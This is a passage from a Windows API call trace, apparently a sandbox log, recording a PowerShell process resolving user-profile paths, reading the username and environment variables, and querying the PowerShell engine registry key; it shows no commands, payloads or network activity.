nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0069.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0x12cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0069.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0069.073] SetErrorMode (uMode=0x1) returned 0x1 [0069.074] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x12d090 | out: lpFileInformation=0x12d090*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x81cb0280, ftLastAccessTime.dwHighDateTime=0x1d62524, ftLastWriteTime.dwLowDateTime=0x81cb0280, ftLastWriteTime.dwHighDateTime=0x1d62524, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0069.074] SetErrorMode (uMode=0x1) returned 0x1 [0069.074] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0069.074] SetErrorMode (uMode=0x1) returned 0x1 [0069.074] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x12d090 | out: lpFileInformation=0x12d090*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x81cb0280, ftLastAccessTime.dwHighDateTime=0x1d62524, ftLastWriteTime.dwLowDateTime=0x81cb0280, ftLastWriteTime.dwHighDateTime=0x1d62524, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0069.074] SetErrorMode (uMode=0x1) returned 0x1 [0069.074] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x12ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0069.074] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x12cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0069.074] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0069.075] SetErrorMode (uMode=0x1) returned 0x1 [0069.075] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x12d0d0 | out: lpFileInformation=0x12d0d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0069.075] SetErrorMode (uMode=0x1) returned 0x1 [0069.075] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0069.075] SetErrorMode (uMode=0x1) returned 0x1 [0069.075] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x12d0d0 | out: lpFileInformation=0x12d0d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0069.075] SetErrorMode (uMode=0x1) returned 0x1 [0069.075] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x12ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0069.075] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x12cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0069.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x12cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0069.076] SetErrorMode (uMode=0x1) returned 0x1 [0069.076] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x12d0d0 | out: lpFileInformation=0x12d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0069.076] SetErrorMode (uMode=0x1) returned 0x1 [0069.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x12cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0069.076] SetErrorMode (uMode=0x1) returned 0x1 [0069.076] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x12d0d0 | out: lpFileInformation=0x12d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0069.076] SetErrorMode (uMode=0x1) returned 0x1 [0069.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x12ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0069.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0x12cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0069.077] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x12cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0069.077] SetErrorMode (uMode=0x1) returned 0x1 [0069.077] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x12d0d0 | out: lpFileInformation=0x12d0d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x81cb0280, ftLastAccessTime.dwHighDateTime=0x1d62524, ftLastWriteTime.dwLowDateTime=0x81cb0280, ftLastWriteTime.dwHighDateTime=0x1d62524, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0069.077] SetErrorMode (uMode=0x1) returned 0x1 [0069.077] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x12cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0069.077] SetErrorMode (uMode=0x1) returned 0x1 [0069.077] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x12d0d0 | out: lpFileInformation=0x12d0d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x81cb0280, ftLastAccessTime.dwHighDateTime=0x1d62524, ftLastWriteTime.dwLowDateTime=0x81cb0280, ftLastWriteTime.dwHighDateTime=0x1d62524, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0069.077] SetErrorMode (uMode=0x1) returned 0x1 [0069.077] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x12ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0069.077] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x12cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0069.079] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0069.079] SetErrorMode (uMode=0x1) returned 0x1 [0069.079] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x12d390 | out: lpFileInformation=0x12d390*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x81cb0280, ftLastAccessTime.dwHighDateTime=0x1d62524, ftLastWriteTime.dwLowDateTime=0x81cb0280, ftLastWriteTime.dwHighDateTime=0x1d62524, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0069.079] SetErrorMode (uMode=0x1) returned 0x1 [0069.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.126] CoTaskMemAlloc (cb=0x804) returned 0x1b851d30 [0069.127] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b851d30, nSize=0x12d6f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d6f8) returned 0x1 [0069.127] CoTaskMemFree (pv=0x1b851d30) [0069.127] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0069.127] GetUserNameW (in: lpBuffer=0x282650, pcbBuffer=0x12d738 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d738) returned 1 [0069.127] CoTaskMemFree (pv=0x282650) [0069.128] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3daded0*="Available", lpRawData=0x3dadc60) returned 1 [0069.128] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.128] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.128] CoTaskMemFree (pv=0x22fde0) [0069.129] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.129] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.129] CoTaskMemFree (pv=0x22fde0) [0069.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.132] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.132] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0069.132] CoTaskMemFree (pv=0x22fde0) [0069.132] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0069.132] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0069.132] CoTaskMemFree (pv=0x22fde0) [0069.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.134] GetCurrentProcessId () returned 0x5f4 [0069.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.136] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d718 | out: phkResult=0x12d718*=0x3b0) returned 0x0 [0069.137] RegQueryValueExW (in: hKey=0x3b0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d69c, lpData=0x0, lpcbData=0x12d698*=0x0 | out: lpType=0x12d69c*=0x1, lpData=0x0, lpcbData=0x12d698*=0x56) returned 0x0 [0069.137] CoTaskMemAlloc (cb=0x5a) returned 0x1b83b5d0 [0069.137] RegQueryValueExW (in: hKey=0x3b0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d66c, lpData=0x1b83b5d0, lpcbData=0x12d668*=0x56 | out: lpType=0x12d66c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d668*=0x56) returned 0x0 [0069.137] CoTaskMemFree (pv=0x1b83b5d0) [0069.137] RegCloseKey (hKey=0x3b0) returned 0x0 [0069.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0069.138] GetFullPathNameW (in: 